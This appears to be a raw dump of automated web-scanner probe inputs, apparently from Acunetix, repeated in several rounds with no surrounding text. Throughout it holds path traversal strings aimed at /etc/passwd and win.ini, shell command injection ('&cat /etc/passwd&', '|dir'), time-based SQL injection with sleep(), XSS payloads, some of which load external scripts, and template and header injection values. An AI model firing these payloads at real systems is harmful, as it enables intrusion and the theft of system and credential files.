\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

acux8739\xc0\xbez1\xc0\xbcz2a\x90bcxuca8739

1

................windowswin.ini

1<ScRiPt >prompt(992190)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<script>prompt(951610)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(921940)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?911289></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(950460)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9820173*9702145)

1

1

1

'+response.write(9820173*9702145)+'

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

'&cat /etc/passwd&'

"+response.write(9820173*9702145)+"

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

1<video><source onerror="javascript:prompt(913057)">

WEB-INF/web.xml

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

WEB-INF\web.xml

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(965414)"></g></svg>

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1<div style=width:expression(prompt(984379))>

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1

1

-1

`cat /etc/passwd`

1<iframe src='data:text/html

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

-1)

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

${99443+100185}

|cat /etc/passwd#

1<body onload=prompt(946530)>

1

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

-1))

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947737)>

1some_inexistent_file_with_long_name%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'|'ld

6KEQp80Z'

)

1&n987276=v946655

1<img src=xyz OnErRor=prompt(989201)>

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

"|"ld

EnpSmYs7')

'"()

1

1

testasp.vulnweb.com

/etc/passwd

1<img/src=">" onerror=alert(940829)>

1

^(#$!@#$)(()))******

1

47Z6D2aD'))

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1<ScRiPt%20>prompt(958371)</sCripT>

1

1

'

1

-1

1&lt

http://testasp.vulnweb.com/t/xss.html?%00.jpg

'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

-1)

1

1

"

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

\xf6<img acu onmouseover=prompt(902256) //\xf6>

1

"

http://hitXrlz9aPUMq.bxss.me/

||cat /etc/passwd

1

1

-1))

${@print(md5(acunetix_wvs_security_test))}

1

1<input autofocus onfocus=prompt(955140)>

acunetix_wvs_invalid_filename

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1AkJIxE4'

&dir

http://www.acunetix.tst

file:///etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

comments

<a href='http://www.acunetix.com'>website security</a>

1

1

1

nEGFEJQw')

1

'&dir&'

'"

[url=http://www.acunetix.com]website security[/url]

comments

1

/\../\../\../\../\../\../\../etc/passwd

"&dir&"

1

1'"()&%<ScRiPt >prompt(903104)</ScRiPt>

1

5LdwIOgK'))

<!--

1

comments/.

1_0GKDa <ScRiPt >prompt(918027)</ScRiPt>

1

1

1

'"()&%<ScRiPt >prompt(994969)</ScRiPt>

1

1

1

WEB-INF/web.xml

|dir

1_933922

1

1

1

1

WEB-INF\web.xml

1

1

1

1

'|dir

../../../../../../../../../../windows/win.ini

1

1

../../../../../../../../../../boot.ini

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu7990\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7990

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux5096\xc0\xbez1\xc0\xbcz2a\x90bcxuca5096

1

1

................windowswin.ini

1<ScRiPt >prompt(930334)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<script>prompt(994414)</script>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<ScRiPt >prompt(969869)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952584></ScRiPt>

response.write(9745589*9510752)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1<ScRiPt >prompt(931225)</ScRiPt>

'+response.write(9745589*9510752)+'

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9745589*9510752)+"

1<video><source onerror="javascript:prompt(906889)">

WEB-INF/web.xml

"&cat /etc/passwd&"

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948330)"></g></svg>

1

1

../../../../../../../../../../etc/passwd.jpg

1

1

1

cat /etc/passwd

1

1

1<div style=width:expression(prompt(919575))>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

${99242+99613}

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<iframe src='data:text/html

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

)

|cat /etc/passwd#

1&n962253=v944930

1

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1some_inexistent_file_with_long_name%00.jpg

1<body onload=prompt(945580)>

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

!(()&&!|*|*|

'|'ld

1

-1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(962839)>

'"()

-1)

1

testasp.vulnweb.com

1<img src=xyz OnErRor=prompt(948665)>

1

1

/etc/passwd

'

1

'

1

-1))

1

1

1

1

1<img/src=">" onerror=alert(989544)>

"

48oisoxz'

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

||cat /etc/passwd

1

1<ScRiPt%20>prompt(938811)</sCripT>

1

inw234Ao')

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

http://hitY9EfnoOF82.bxss.me/

1&lt

&dir

doo5Xc0o'))

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

-1

1

1

1

comments

\xf6<img acu onmouseover=prompt(983313) //\xf6>

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

"&dir&"

-1)

http://www.acunetix.tst

1

1

comments

file:///etc/passwd

1<input autofocus onfocus=prompt(917072)>

-1))

1

1

|dir

1

1

<a href='http://www.acunetix.com'>website security</a>

comments/.

1

hlKPCsfw'

/\../\../\../\../\../\../\../etc/passwd

'"

1'"()&%<ScRiPt >prompt(940993)</ScRiPt>

1

[url=http://www.acunetix.com]website security[/url]

1

'|dir

zKvy0Cox')

1

1_EJcCk <ScRiPt >prompt(964930)</ScRiPt>

'"()&%<ScRiPt >prompt(991769)</ScRiPt>

WEB-INF/web.xml

1

<!--

BZZJZ4xA'))

1

1

"|dir

WEB-INF\web.xml

1

1

1

1_961095

1

1

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

acu2358\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2358

1

acux6635\xc0\xbez1\xc0\xbcz2a\x90bcxuca6635

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(946400)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<script>prompt(915219)</script>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1<ScRiPt >prompt(918122)</ScRiPt>

response.write(9263214*9383280)

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?956307></ScRiPt>

1

1

1

1

'+response.write(9263214*9383280)+'

&cat /etc/passwd&

1<ScRiPt >prompt(924756)</ScRiPt>

1

1

1

'&cat /etc/passwd&'

WEB-INF/web.xml

"+response.write(9263214*9383280)+"

1

1

1

1<video><source onerror="javascript:prompt(932122)">

1

WEB-INF\web.xml

"&cat /etc/passwd&"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(968632)"></g></svg>

1

1

1

cat /etc/passwd

../../../../../../../../../../etc/passwd

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1<div style=width:expression(prompt(962204))>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

`cat /etc/passwd`

${99583+100042}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1<iframe src='data:text/html

1

1

|cat /etc/passwd#

1&n974673=v901679

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1<body onload=prompt(953467)>

1some_inexistent_file_with_long_name%00.jpg

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

)

1

'|'ld

-1)

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(969483)>

1

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

"|"ld

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

!(()&&!|*|*|

1<img src=xyz OnErRor=prompt(925331)>

-1))

1

1

1

testasp.vulnweb.com

'"()

/../..//../..//../..//../..//../..//etc/passwd.jpg

OrDqaf82'

1<img/src=">" onerror=alert(905137)>

^(#$!@#$)(()))******

1

1

1

1

XzIuGeLN')

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1<ScRiPt%20>prompt(988207)</sCripT>

"

1

TVHb6wTo'))

'

1

1

1&lt

1

1

/etc/passwd

||cat /etc/passwd

1

1

"

-1

\xf6<img acu onmouseover=prompt(937418) //\xf6>

&dir

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://hitwz10b5A3Fo.bxss.me/

1

acunetix_wvs_invalid_filename

-1)

1<input autofocus onfocus=prompt(904348)>

1

${@print(md5(acunetix_wvs_security_test))}

1

<a href='http://www.acunetix.com'>website security</a>

1

comments

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'&dir&'

1

-1))

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

${@print(md5(acunetix_wvs_security_test))}\

comments

[url=http://www.acunetix.com]website security[/url]

1

http://www.acunetix.tst

"&dir&"

S6FOt2r1'

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

'"

1_UDhh7 <ScRiPt >prompt(930290)</ScRiPt>

comments/.

1

1

1'"()&%<ScRiPt >prompt(963140)</ScRiPt>

1

|dir

hMX3NIkX')

<!--

1

1

iQIILmv6'))

1

file:///etc/passwd

'"()&%<ScRiPt >prompt(968450)</ScRiPt>

1

1

'|dir

1

1

/\../\../\../\../\../\../\../etc/passwd

1_973193

1

1

1

"|dir

1

1

1

WEB-INF/web.xml

1

1

1

1

WEB-INF\web.xml

1

1

1

../../../../../../../../../../windows/win.ini

acu2813\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2813

1

1

1

../../../../../../../../../../boot.ini

acux9783\xc0\xbez1\xc0\xbcz2a\x90bcxuca9783

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1<ScRiPt >prompt(912262)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<script>prompt(934209)</script>

1

1

1

................windowswin.ini

1

1<ScRiPt >prompt(949124)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?969175></ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(928641)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<video><source onerror="javascript:prompt(924324)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

response.write(9472775*9735611)

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(994281)"></g></svg>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

&cat /etc/passwd&

'+response.write(9472775*9735611)+'

1<div style=width:expression(prompt(901224))>

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9472775*9735611)+"

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1<iframe src='data:text/html

'&cat /etc/passwd&'

1

WEB-INF/web.xml

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1<body onload=prompt(905080)>

1

1

1

"&cat /etc/passwd&"

WEB-INF\web.xml

1

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(984723)>

../../../../../../../../../../etc/passwd.jpg

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

1

cat /etc/passwd

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

${99887+99742}

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1

1<img src=xyz OnErRor=prompt(957367)>

1

1

`cat /etc/passwd`

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n976433=v932419

1<img/src=">" onerror=alert(956810)>

1

-1

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

1some_inexistent_file_with_long_name%00.jpg

1

|cat /etc/passwd#

1

-1)

1

1<ScRiPt%20>prompt(900916)</sCripT>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

!(()&&!|*|*|

'|'ld

-1))

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'"()

/etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1&lt

^(#$!@#$)(()))******

WIUxVjK7'

1

1

testasp.vulnweb.com

"|"ld

1

mqHq5zYL')

1

'

\xf6<img acu onmouseover=prompt(920000) //\xf6>

1

UIqfHM0l'))

1

1

1

http://hitYq7sE23fXe.bxss.me/

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(975907)>

"

1

-1

'

1

1

acunetix_wvs_invalid_filename

-1)

${@print(md5(acunetix_wvs_security_test))}

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

comments

1

1

"

-1))

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

1

comments

1

ZgZ5cKFx'

1

1

1

||cat /etc/passwd

http://www.acunetix.tst

comments/.

1

1_aeeSW <ScRiPt >prompt(950999)</ScRiPt>

i3m8MlQO')

1

1

'"

1

file:///etc/passwd

1'"()&%<ScRiPt >prompt(958126)</ScRiPt>

1

<!--

1

1

1

Z0xwSZWo'))

1

/\../\../\../\../\../\../\../etc/passwd

'"()&%<ScRiPt >prompt(903201)</ScRiPt>

1

&dir

1

1

1

1

1

1

1

WEB-INF/web.xml

1_970723

'&dir&'

1

1

1

WEB-INF\web.xml

"&dir&"

1

1

1

|dir

../../../../../../../../../../windows/win.ini

1

../../../../../../../../../../boot.ini

'|dir

1

../../../../../../../../../../windows/win.ini.jpg

"|dir

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

................windowswin.ini

acu6147\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6147

1

1

1

acux1839\xc0\xbez1\xc0\xbcz2a\x90bcxuca1839

..\..\..\..\..\..\..\..\windows\win.ini

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(947305)</ScRiPt>

1

1

1

1<script>prompt(975226)</script>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

response.write(9236026*9514405)

1<ScRiPt >prompt(934949)</ScRiPt>

1

1

1

'+response.write(9236026*9514405)+'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?912818></ScRiPt>

1

1

1

"+response.write(9236026*9514405)+"

1

1<ScRiPt >prompt(956748)</ScRiPt>

1

WEB-INF/web.xml

1

1

&cat /etc/passwd&

1<video><source onerror="javascript:prompt(973227)">

1

1

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(942423)"></g></svg>

SomeCustomInjectedHeader:injected_by_wvs

WEB-INF\web.xml

1

../../../../../../../../../../etc/passwd

1

'&cat /etc/passwd&'

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1<div style=width:expression(prompt(999039))>

1

${99504+99861}

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1&n960159=v947959

1

1<body onload=prompt(966022)>

cat /etc/passwd

1some_inexistent_file_with_long_name%00.jpg

-1)

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(988522)>

)

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

testasp.vulnweb.com

1

-1))

1

1<img src=xyz OnErRor=prompt(901460)>

1

|cat /etc/passwd#

1

!(()&&!|*|*|

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<img/src=">" onerror=alert(979305)>

3zMsB6Zk'

1

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

^(#$!@#$)(()))******

'"()

1

'|'ld

1

cRHr8Lhy')

1

1<ScRiPt%20>prompt(964580)</sCripT>

1

'

1

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1&lt

Y9rnPS2h'))

1

"|"ld

1

"

\xf6<img acu onmouseover=prompt(919471) //\xf6>

1

1

1

-1

/etc/passwd

1<input autofocus onfocus=prompt(992275)>

1

${@print(md5(acunetix_wvs_security_test))}

http://testasp.vulnweb.com/t/xss.html?%00.jpg

-1)

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

<a href='http://www.acunetix.com'>website security</a>

1

acunetix_wvs_invalid_filename

'

1

-1))

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

http://hittlEpgQVD4q.bxss.me/

1_F7ONF <ScRiPt >prompt(959712)</ScRiPt>

1

RygRv2R2'

"

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

http://www.acunetix.tst

||cat /etc/passwd

8Aqn96aq')

1

1

comments/.

1

1

1

file:///etc/passwd

&dir

u4X2JOhp'))

1

'"

1

1'"()&%<ScRiPt >prompt(931075)</ScRiPt>

1

1

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

1

1

<!--

1

'"()&%<ScRiPt >prompt(935313)</ScRiPt>

"&dir&"

1

1

WEB-INF/web.xml

1

1_960117

1

|dir

1

WEB-INF\web.xml

1

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

................windowswin.ini

1

1

1

acu1212\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1212

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

acux7157\xc0\xbez1\xc0\xbcz2a\x90bcxuca7157

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt >prompt(920298)</ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<script>prompt(903692)</script>

response.write(9208112*9230812)

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

'+response.write(9208112*9230812)+'

1<ScRiPt >prompt(962777)</ScRiPt>

1

1

1

1

"+response.write(9208112*9230812)+"

1

&cat /etc/passwd&

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?973027></ScRiPt>

1

1

WEB-INF/web.xml

1

1<ScRiPt >prompt(922727)</ScRiPt>

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

WEB-INF\web.xml

1

1<video><source onerror="javascript:prompt(925323)">

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(986136)"></g></svg>

1

SomeCustomInjectedHeader:injected_by_wvs

1

1

../../../../../../../../../../etc/passwd.jpg

cat /etc/passwd

1

1<div style=width:expression(prompt(999457))>

1&n987676=v968648

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

${100053+99959}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

`cat /etc/passwd`

1<iframe src='data:text/html

if(now()=sysdate(),sleep(3.468),0)/*'XOR(if(now()=sysdate(),sleep(3.468),0))OR'"XOR(if(now()=sysdate(),sleep(3.468),0))OR"*/

1some_inexistent_file_with_long_name%00.jpg

1

1

1

1

(select(0)from(select(sleep(6.936)))v)/*'+(select(0)from(select(sleep(6.936)))v)+'"+(select(0)from(select(sleep(6.936)))v)+"*/

|cat /etc/passwd#

1<body onload=prompt(913338)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1

)

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

'|'ld

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(944880)>

1

1

-1)

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

-1))

1<img src=xyz OnErRor=prompt(934046)>

"|"ld

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

^(#$!@#$)(()))******

1

'"()

1<img/src=">" onerror=alert(923514)>

BwnfTNdv'

'

1

1

/etc/passwd

1

vPJ0dfn5')

1

1

1

1

1<ScRiPt%20>prompt(916844)</sCripT>

"

'

1

1

1

ZOr6k5DH'))

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

${@print(md5(acunetix_wvs_security_test))}

1

1

1&lt

-1

http://hitCr6IGmNAST.bxss.me/

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

\xf6<img acu onmouseover=prompt(928444) //\xf6>

1

-1)

1

1

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

-1))

1

1<input autofocus onfocus=prompt(965435)>

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

&dir

lQQPA4kE'

1

comments

file:///etc/passwd

1

AcuTM2Sg')

1

'"

'&dir&'

1

comments

1'"()&%<ScRiPt >prompt(963777)</ScRiPt>

1

/\../\../\../\../\../\../\../etc/passwd

<a href='http://www.acunetix.com'>website security</a>

"&dir&"

1

1

ky54hxmP'))

<!--

1

'"()&%<ScRiPt >prompt(932755)</ScRiPt>

comments/.

1

[url=http://www.acunetix.com]website security[/url]

WEB-INF/web.xml

|dir

1_933695

1

1

